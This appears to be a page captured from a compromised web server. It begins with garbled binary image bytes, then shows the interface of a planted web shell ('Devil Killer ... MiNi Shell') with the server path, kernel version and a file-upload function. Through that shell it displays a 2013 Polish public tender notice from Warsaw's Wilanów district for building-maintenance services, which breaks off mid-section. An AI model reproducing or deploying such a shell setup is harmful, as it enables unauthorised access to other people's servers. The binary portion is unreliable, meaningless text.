JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/27261-N-2013.html

<p class="kh_header"><b>Warszawa: Konserwacja i dokonanie robót naprawczych oraz usuwanie awarii w obiektach będących własnością m.st. Warszawy położonych na terenie Dzielnicy Wilanów</b><br>
<b>Numer ogłoszenia: 27261 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Wilanów , ul.  Stanisława Kostki Potockiego 11, 02-958 Warszawa, woj. mazowieckie, tel. 22 6426001 w. 407, faks 22 6427643.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i dokonanie robót naprawczych oraz usuwanie awarii w obiektach będących własnością m.st. Warszawy położonych na terenie Dzielnicy Wilanów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: 
Konserwacja i dokonanie robót naprawczych oraz usuwanie awarii w obiektach będących własnością m.st. Warszawy położonych na terenie Dzielnicy Wilanów
I. Instalacja c. o.:
1. Kompleksowa kontrola przed sezonem grzewczym.
2. Wykonywanie regulacji instalacji c.o.
3. Kontrola działania w trakcie sezonu, kontrola szczelności,
- Usuwanie nieszczelności instalacji
- Wymiana instalacji na odcinkach do jednego mb.,
4. Napełnianie i uzupełnianie zładu w miarę potrzeb. 
5. Usuwanie przyczyn niedogrzewania pomieszczeń.
6. Odpowietrzanie układu i poszczególnych urządzeń.
7. Wykonywanie innych czynności typowych dla obsługi instalacji c.o., w tym:
- Wymiana zaworów grzejnikowych,
- Uzupełnianie ubytków izolacji termicznej.
8. Konserwacja, regulacja i naprawy  urządzeń w węźle cieplnym.
II. Instalacja wod. - kan.:
1. Kontrola szczelności, kontrola przepustowości.
2. Bieżące udrażnianie pionów i poziomów kanalizacyjnych z wyłączeniem podejść w częściach wynajętych.
3. Usuwanie nieszczelności instalacji wodociągowej z wyłączeniem armatury w częściach wynajętych, w tym:
- Uszczelnianie wszystkich zaworów wodnych oraz ich pojedyńcza wymiana na instalacji,
- Wymiana instalacji na odcinkach do 1 mb.
4. Usuwanie miejscowych przecieków na pionach i poziomach kanalizacji łącznie z wymianą poszczególnych elementów. 
5. Utrzymanie kanalizacji sanitarnej w należytym stanie technicznym i użytkowym.
6. Zabezpieczenie instalacji i urządzeń przed mrozem.
7. Przedmiot zamówienia nie obejmuje konserwacji i naprawy mis klozetowych, urządzeń płuczących z wyposażeniem, zlewozmywaków, umywalek z syfonami, baterii i zaworów czerpalnych oraz innych urządzeń sanitarnych, w które wyposażone są wynajęte lokale.
III. Instalacja hydrantowa, hydrantów i gaśnic - 8 szt. ( 7 x GP-6z ABC, 1 x GSE - 2x ).
IV.  Instalacja kanalizacji deszczowej przedmiotem usługi jest zapewnienie obsługi i konserwacji: 
Utrzymanie kanalizacji deszczowej w należytym stanie technicznym i użytkowym.
1. Czyszczenie rewizji, co najmniej dwa razy w roku.
2. Wymiana odcinków rur na odrębne zlecenie Zamawiającego.
3. Konserwacja instalacji odwadniającej i drenażowej wraz z  zainstalowanymi urządzeniami m.in. podgrzewanymi wpustami dachowymi, zbiornikiem wodnym p.-poż, instalacją rozsączającą, pompami i powiązanymi urządzeniami branży elektrycznej, automatyką i sygnalizacją.
4. Utrzymanie sprawności sygnalizacyjnej ewentualnej awarii przepompowni i zbiornika wody p.- poż.
V. Wentylacja nawiewno - wywiewna, klimatyzacja i agregat wody lodowej uwzględniając m.in.:
       1.  CentraleJUWENTtyp:CP-1-P (L)-W/1-6 ): 
                 7 szt. central nawiewnych,
                 4 szt. central wywiewnych,
- zakup i wymianę filtrów powietrza ( wg stanu zużycia lub zaleceń producenta ) - kasetowe klasy EU4/48,
- kontrolę stanu nagrzewnic wodnych i chłodnic oraz czyszczenie lamel,
- kontrolę zespołów wentylatorów nawiewnych i wywiewnych - ADH 160,
- sprawdzanie łożysk poszczególnych urządzeń,
- kontrolę naciągu pasków klinowych i ewentualna wymiana,
- kontrolę pracy odkraplaczy i syfonów odpływowych, przepustnic powietrza, 
- sprawdzanie prądów wentylatorów,
- kontrolę działania mikroprocesorowych sterowników,
- kontrolę czujników, przetworników pomiarowych ( temp., ciś., wilgotności ),
- sprawdzanie stanu urządzeń zabezpieczających,
- wymiana i zakup żarówek sygnalizacyjnych,
- sprawdzanie działania siłowników przepustnic i zaworów regulacyjnych,
- sprawdzanie pomp obiegowych nagrzewnic,
- Sprawdzanie i naprawa przewodów wentylacyjnych i ich izolacji oraz kontrola przepływów powietrza w poszczególnych zespołach N. -W.
    2.  Okresowa kontrola i konserwacja:
- wentylatorów dachowych typu SILWENT - 160 z siln.szt. 9
- wentylatorów dachowych typu DAs-200 z sil. szt. 2
- wentylatorów nakratkowych typu EDM 160 z regulatorem obrotów szt. 4
- wentylator typu TD-500160HS szt. 1
- zespół kurtyn powietrznych typu Frico seria AD 220 E12 szt. 1
- klimatyzatory FUJITSU R410A szt. 2
-  klimatyzatory dwururowe szt. 5
3.  Agregat wody lodowej AERMEC NRA550 - 1 szt.
- Sprawdzenie stanu skraplacza,
- Sprawdzenie historii pracy agregatu, układu sterowania i ewentualna konfiguracja systemu,
- Sprawdzenie i regulacja ciśnień roboczych,
- Sprawdzenie szczelności układu freonowego, sprawdzenie połączeń, sprawdzenie stanu zawilgocenia czynnika, sprawdzenie stanu napełnienia instalacji, ewentualna korekta napełnienia,
- Sprawdzenie poziomu oleju w sprężarkach,
- Sprawdzenie poboru mocy i poboru prądów wszystkich odbiorników elektrycznych,
- Sprawdzenie pracy agregatu przy pełnym obciążeniu sprężarek,
- Sprawdzenie i korekta zamocowań kabli zasilających i przewodów sterowania,
- Sprawdzenie i regulacja przetworników ciśnienia i zwłok czasowych,
- Sprawdzenie działania układu sterowania i elementów automatyki,
- Sprawdzenie poprawności działania czujnika przepływu, 
- Sprawdzenie wirników wentylatorów i wszystkich zamocowań mechanicznych,
VI. Wentylacja grawitacyjna:
- Okresowa kontrola i konserwacja kanałów wentylacyjnych,
VII. Instalacja elektryczna - zakres obejmuje:
1. Wymianę uszkodzonych opraw oświetleniowych, bezpieczników, osprzętu elektroinstalacyjnego oraz podłączeń urządzeń elektrycznych i innych odbiorników elektrycznych,
2. Naprawę osprzętu elektroinstalacyjnego,
3. Lokalizowanie uszkodzeń instalacji,
4. Nadzór i konserwacja rozdzielnic,
5. Naprawa uszkodzeń kabli energetycznych,
6. Zabezpieczenie ciągłości ruchu w zakresie sprawności przyłączy elektrycznych,
7. Prowadzenie książki kontrolnej przeprowadzanych prac konserwacyjnych,
8. Sprawdzanie urządzeń instalacyjnych ( takich jak wyłączniki różnicowo - prądowe, systemy oświetlenia awaryjnego, wyłączniki  główne prądu, itp. ) zgodnie z zaleceniami producenta i przepisami eksploatacji urządzeń elektrycznych i udokumentowanie ich w książce konserwacji instalacji,
9. Utylizacja zużytego osprzętu elektroenergetycznego leży po stronie Wykonawcy,
10. Okresowa kontrola sprawności innego sprzętu elektrycznego,
11. Konserwacja i okresowa kontrola systemu oddymiana i przewietrzania w tym: poprawności działania centrali sterującej urządzeniami oddymiającymi i przewietrzającymi UOCD (producent UNIMA-tech Sp. z o.o.), czujki dymowe ECO 1003, przyciski alarmowe sterujące oddymianiem RWO-1, czujka deszcz-wiatr CWD-2, czujka reaguje na przekroczenie określonej wartości krytycznej, przycisk przewietrzania PP-20 z klawiaturą membranową, napędy zębatkowe do okien dymowych zamontowanych w szklanym dachu (producent D+H Polska Sp. z o.o.).
12. instalację odgromową.
VIII.  Instalacja gazowa - w zakres wchodzi: 
1. Doszczelnianie kurków gazowych nie wymagających wyłączenia dostawy gazu oraz wymiana zaworów gazowych przy odbiornikach (koszt zaworów pokrywa Zamawiający).
2. Usuwanie wszystkich drobnych nieszczelności stwierdzonych na instalacj
3. Konserwacja instalacji gazowej poprzez drobne czyszczenie i malowanie zgodnie z przepisami.
4. Odcinanie instalacji gazowej w przypadku stwierdzenia uszkodzeń lub nieprzydatności aparatów gazowych do dalszego użytku celem zapobieżenia zagrożenia życia lub zdrowia użytkowników.
5. Coroczny przegląd szczelności instalacji gazowej na warunkach zgodnych z obowiązującymi przepisami i zgodnie z umową.
6. Powiadamianie Zamawiającego i właściwych służb o nieprawidłowościach w pracy kotła gazowego ( jeśli taki występuje ).
IX.  Kotłownia gazowa - w zakres wchodzi:
1. Nadzór i przegląd kotła wodnego c.o. firmy DIE DIETRICH THERMIQUE ( DTG 330-14S, 
260 kW, 2008 r. ) zasilany gazem ziemnym wraz z pełnym oprzyrządowaniem tj. pompami, zbiornikami oraz nadzór i kontrola sterowania i automatyki itp.,
2. Gazowy zbiornikowy podgrzewacz wody typu RICZMOND z systemem samooczyszczania EverKleen PL 100 do przygotowania ciepłej wody użytkowej model PL 75-75 zasilany gazem ziemnym,
3. Kolektor gazowy śred. 250, L=2, 5 m,
4. Naczynie wzbiorcze ciśnieniowe Reflex N300,
5. Aktywny system kontroli wycieku gazu typu GX firmy GAZEX Warszawa,
6. Pompa obiegu kotłowego WILO TOP - S 40/7,
7. Pompa instalacji centralnego ogrzewania WILO TOP - E 30/1-7,
8. Pompa instalacji ciepła technologicznego WILO TOP - E 40/1-10,
9. Pompa cyrkulacyjna ciepłej wody użytkowej CIRCOSTAR typ WILO STAR - Z25/2 EM,
10. Kompaktowa stacja uzdatniania wody dla kotłowni o mocy do 350 kW złożona z urządzeń firmy BWT,
11. Magneto filtr MFW - 65 VALMARK,
12. Inne urządzenia i zawory zamontowane na instalacjach: 
- centralnego ogrzewania, ciepła technologicznego, 
- obiegu kotłowego, 
- centralnej ciepłej wody użytkowej, 
- gazowej, 
- odprowadzania spalin z okresową neutralizacją skroplin gazów wylotowych (z kotłów gazowych) mlekiem wapiennym.
X. Urządzenia dźwigowe - takie jak:
- Dźwig osobowy, hydrauliczny typ EASYLIFE AS- L/480  - szt. 1
- Platforma przychodowa dla niepełnosprawnych prod. ALTECH spol. s.r.o. typ DELTA - szt. 2.
  Zakres obejmuje:
 1.1 Jazda i kontrola funkcji:
- sprawdzenie elementów oświetlenia kabiny,
- sprawdzenie działania systemu awaryjnego oświetlenia kabiny / opcjonalnie,
- sprawdzenie funkcji systemu komunikacji głosowej przy zasilaniu sieciowym i z akumulatora,
- sprawdzenie działania wentylatora / opcjonalnie,
- sprawdzenie działania przycisków piętrowych w kabinie,
- sprawdzenie działania systemu jazdy pożarowej / opcjonalnie,
- sprawdzenie działania przycisków wezwań w kasetach na przystankach,
- sprawdzenie działania przycisków otwierania i zamykania drzwi,
- sprawdzenie działania urządzeń nawrotu drzwi - fotokomórka, kurtyna, kontakt mechaniczny nawrotu, system prądowy nawrotu drzwi,
- sprawdzenie parametrów pracy drzwi kabiny z napędem elektrycznym; czas otwierania, czas otwarcia , czas zamykania, czas reakcji przy nawrocie, 
- sprawdzenie płynności pracy drzwi przystankowych,
- kontrola działania wyłącznika STOP na kabinie,
- kontrola działania kontaktu zwisu lin i chwytaczy,
- kontrola urządzeń bezpieczeństwa na kabinie, 
- kontrola działania funkcji jazd rewizyjnych z dachu kabiny, 
- kontrola stanu elementów zawieszenia drzwi przystankowych; prowadnice zawieszenia drzwi, rolki jezdne i kontrujące, linki, odbojniki, prowadniki, progi, oczyszczenie,  sprawdzenie działania kontaktów bezpieczeństwa drzwi przystankowych, oczyszczenie i regulacja,
- oczyszczenie, smarowanie i regulacja krzywki ruchomej,
- sprawdzenie zamków i rygli drzwi przystankowych, regulacja i smarowanie,
- sprawdzenie skuteczności awaryjnego otwierania drzwi przystankowych,
- sprawdzenie działania amortyzatorów - domykaczy drzwi przystankowych,
- sprawdzenie kontaktów podłogi ruchomej, lub progu ruchomego, oczyszczenie i smarowanie, 
- sprawdzenie układu czasowego przełączenia sterowania,
- sprawdzenie parametrów komfortu jazdy; start, płynność jazdy, odgłosy, hamowanie,
- smarowanie prowadnic kabinowych i przeciwwagowych / prowadniki ślizgowe,
- czyszczenie prowadnic kabinowych i przeciwwagowych / prowadniki rolkowe,
- sprawdzenie i regulacja układu odwzorowania położenia kabiny w szybie,
- sprawdzenie dokładności  zatrzymania na przystanku, 
- sprawdzenie działania urządzeń sygnalizacyjnych; strzałek kierunku jazdy, sygnalizatorów dźwiękowych przybycia kabiny, piętrowskazywaczy,
- kontrola działania wyłącznika STOP w podszybiu,
- sprawdzenie oświetlenia szybu,
- sprawdzenie przejazdu przeciwwagi,
- czyszczenie  podszybia i dachu kabiny,
- kontrola zderzaków kabiny i przeciwwagi - próba dynamiczna,
- kontrola obciążki ogranicznika prędkości, smarowanie,
- kontrola połączeń; skręcanych, nitowanych, spawanych.
1.2  Kontrola zespołu napędowego i urządzeń w maszynowni:
- kontrola zespołu napędowego, czyszczenie,
- czyszczenie, smarowanie i regulacja luzownika hamulca z rozbieraniem,
- czyszczenie, smarowanie i regulacja hamulca z rozbieraniem,
- sprawdzenie kontaktów hamulca, 
- sprawdzenie poziomu oleju w zespole napędowym ( wciągarki reduktorowe ),
- sprawdzenie stanu  lin nośnych smarowanie,
- sprawdzenie stanu rowków tarczy ciernej,
- wykonanie próby sprzężenia ciernego,
- sprawdzenie stanu koła zdawczego,
- oczyszczenie i kontrola stanu zamocowań lin nośnych / pasów nośnych / opcjonalnie,
- kontrola ogranicznika prędkości czyszczenie i smarowanie z rozbieraniem,
- kontrola stanu linki ogranicznika prędkości,
- wykonanie próby działania aparatu chwytnego,
- czyszczenie aparatury sterowej i urządzeń sterujących,
- kontrola połączeń w tablicy sterowej,
- kontrola działania zabezpieczeń prądowych,
- kontrola wyłącznika głównego i połączeń w obwodach siłowych,
- sprawdzenie i analiza zdarzeń zapisanych przez system ( sterowania mikroprocesorowe ),
- kontrola systemu REM - połączenia elektryczne, stan akumulatora itp. / opcjonalnie,
- wykonanie funkcji SELFTEST - samotestowanie urządzenia. 
3. Uczestnictwo WYKONAWCY w okresowych badaniach UDT.
4. Dostęp do całodobowego Centrum ONLINE. 
5. Całodobowe uwalnianie pasażerów uwięzionych w kabinie dźwigu.
6. Usługa pogotowia dźwigowego całodobowa.
7.Wszelkie naprawy związane z wymianą części zamiennych wykonywane będą na podstawie odrębnego, pisemnego zlecenia ZAMAWIAJĄCEGO.
8. Materiały eksploatacyjne takie jak: śruby, blachowkręty, podkładki, nakrętki, kleje, czyściwo, środki myjące, olej przekładniowy oraz smary stałe należy uwzględnić w kosztach konserwacji.
9. Wykonawca zobowiązany jest do wykonania i przedstawienia Zamawiającemu raportów: 
  - protokół wykonania przeglądu,
  - wykonywanie pomiarów:
 a) rezystancji izolacji, 
 b) skuteczności ochrony przeciwporażeniowej.
10. do obowiązków Wykonawcy należy również oczyszczenie podstawowych elementów dźwigu zamontowanych w maszynowni, podszybiu i dachu kabiny,
11. Utylizacja - odebranie odpadów eksploatacyjnych typu świetlówki, smary, oleje oraz elementów pozostałych po naprawach np. liny, koła itp., 
12. Wszystkie pomiary elektryczne należy wykonywać zgodnie z obowiązującymi przepisami.
XI. Roboty budowlane:
1. Drobne naprawy budowlane do 1 m2 w miejscu - jednak nie więcej niż 5 m2 łącznie (część administracyjna). 
2. Utrzymanie w sprawności technicznej stolarki drzwiowej i okiennej (w części administracyjnej).
3. Drobne naprawy blacharsko - dekarskie do 1 m2 w miejscu - jednak nie więcej niż 5 m2 łącznie. 
4. Drobne naprawy kominów spalinowych.
4.1. Przeglądy kominiarskie udokumentowane protokołem.
II.Opis obiektów objętych usługą konserwacji wg wyżej wyszczególnionych opisów:
1. ul. Resorowa 16 - budynek 3- kondygnacyjny ( 1 podziemna i 2 nadziemne ) z 1950 r. z dachem kopertowym, 4 mieszkania - instalacja gazowa do kuchni gazowych, ogrzewanie i c.w. z sieci miejskiej ( węzeł cieplny ) , wentylacja grawitacyjna, powierzchnia lokali ogółem 145, 42 m2. Budynek komunalny.
Zakres konserwacji obejmuje:
a. instalację c.o. bez pkt 9,
b. instalację wod. - kan. 
c. instalację elektryczną,
d. instalację gazową
e. wentylacja grawitacyjna
f. roboty budowlane
2. ul. Radosna 11- budynek parterowy częściowo podpiwniczony z dachem płaskim 
( wyremontowany w 2010 r. ) z roku 1983- 1985 r. ( ogólnie budynek przeznaczony do rozbiórki ), ogrzewanie z sieci miejskiej ( węzeł cieplny ), c.w. termy elektryczne, wentylacja grawitacyjna, powierzchnia ogółem 819, 05 m2 , w tym ok. 2/3 powierzchni jest użytkowana, ale wymiennikownia znajduje się w podziemiu części nieużytkowanej, główna tablica rozdzielcza również jest w części nieużytkowanej. W budynku obecnie znajduje się biblioteka do której instalacje c.o., wod.-kan. i elektryczna przechodzą przez część nieużytkowaną. Użytkownikami są: Biblioteka Wilanów, Centrum Kultury Wilanów i Klub Wędkarski.
Zakres konserwacji obejmuje:
a. instalację c.o. bez pkt 9, stan zły
b. instalację wod. - kan., stan zły 
c. instalację elektryczną, stan zły
d. wentylacja grawitacyjna
e. roboty budowlane
3. ul. Wiertnicza 147 - budynek 3- kondygnacyjny ( 1 podziemna i 2 nadziemne ) z 1935 r.
( ocieplony - ok. 2004 r. ) z dachem kopertowym,6 mieszkań - w 5 lokalach ogrzewanie elektryczne, w 1 lokalu piec kaflowy, brak instalacji gazowej. Tablica rozdzielcza na klatce schodowej. Powierzchnia lokali ogółem 226, 84 m2. Budynek komunalny.
Zakres konserwacji obejmuje:
a. instalację c.o. bez pkt 9,
b. instalację wod. - kan. 
c. instalację elektryczną,
d. instalację gazową
e. wentylacja grawitacyjna
f. roboty budowlane
4. ul. Przyczółkowa 58 - budynek parterowy z poddaszem mieszkalnym( dach dwuspadowy ),  5 mieszkań - w 4 lokalach instalacja gazowa do kuchni gazowych, w 2 lokalach ogrzewanie piecami na węgiel,  w 1 lokalu znajduje się kominek, 2 lokale ogrzewane elektrycznie, wentylacja grawitacyjna. Ogólna powierzchnia lokali 197, 91 m2. Budynek komunalny.
Zakres konserwacji obejmuje:
a. instalację wod. - kan. 
b. instalację elektryczną ( instalacja wyremontowana ok. 2009 r.) ,
c. instalację gazową
d. wentylacja grawitacyjna
e. roboty budowlane
5. ul. Potułkały 10 - parterowy budynek z 1963 r. (w dobrym stanie technicznym ) 
o powierzchni 98 m2 z dachem płaskim, ogrzewany elektrycznie + kominek. Obecnie użytkownikiem jest klub kolarski.
Zakres konserwacji obejmuje:
a. instalację wod. - kan. 
b. instalację elektryczną,
c. wentylacja grawitacyjna
d. roboty budowlane
6. ul. St. Kostki Potockiego 31 - parterowy budynek częściowo podpiwniczony z dachem kopertowym z 1924 r. użytkowany przez Pocztę Polską, ogrzewanie i c.w. z pieca gazowego ( kotłownia ), wentylacja grawitacyjna. Powierzchnia użytkowa 251, 44 m2 .
Zakres konserwacji obejmuje:
a. instalację gazową
b. roboty budowlane
7. ul. St. Kostki Potockiego 31 - nowo wybudowany budynek parterowy z 2010 r. z dachem płaskim, w którym obecnie mieści się toaleta miejska z kioskiem RUCHU. Powierzchnia użytkowa 89, 4 m2. Instalacja gazowa z sieci miejskiej, c.w. i ogrzewanie poprzez piec gazowy. Użytkownikiem jest najemca budynku ( budynek na gwarancji ).
Zakres konserwacji obejmuje:
a. instalację c.o. bez pkt 9,
b. instalację wod. - kan. 
c. instalację elektryczną,
d. instalację gazową
8. ul. Przyczółkowa 27a - wyremontowany, zmodernizowany i rozbudowany budynek 4 kondygnacyjny ( 3 kondygnacje nadziemne i 1 podziemna ) - na bazie budynku pochodzącego z 1930 r. - z dachem płaskim. Instalacja gazowa z sieci miejskiej, c.w. i ogrzewanie poprzez piec gazowy ( kotłownia ). Wentylacja mechaniczna, klimatyzacja oraz agregat wody lodowej. Użytkownikami są: Biblioteka Wilanów, Centrum Kultury Wilanów i Ośrodek Pomocy Społecznej.
Zakres konserwacji obejmuje:
a. instalację c.o.,
b. instalację wod. - kan. 
c. instalację elektryczną,
d. instalację gazową
e. instalację nawiewno - wywiewną
f. instalację kanalizacji deszczowej
e. roboty budowlane
f. kotłownia gazowa
g. obsługa urządzeń dźwigowych
9. ul. Wiktorii Wiedeńskiej 6 m. 3, 4 - pojedyncze lokale mieszkalne we Wspólnocie Mieszkaniowej. Lokale składają się z 3 pokojów, kuchni, wc i łazienki z wc. Istnieją dwa oddzielne piony zasilające - jeden zasila kuchnię i wc, a drugi łazienkę z wc.
Zakres konserwacji obejmuje:
a. instalację wod. - kan. - od pionów gównych do punktów odbioru.
b. instalację gazową - od pionu głównego do punktu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.33.10.00-6, 45.33.00.00-9, 45.31.00.00-3, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz co najmniej 2 usług o wartości brutto po min. 80.000,00 PLN każda, polegających na konserwacji i naprawie instalacji c.o., wod.-kan., elektrycznej, gazowej i wentylacyjnej, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
Do wykazu usług należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane lub, w przypadku usług ciągłych lub okresowych, są wykonywane należycie (np. referencje).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, w tym co najmniej:
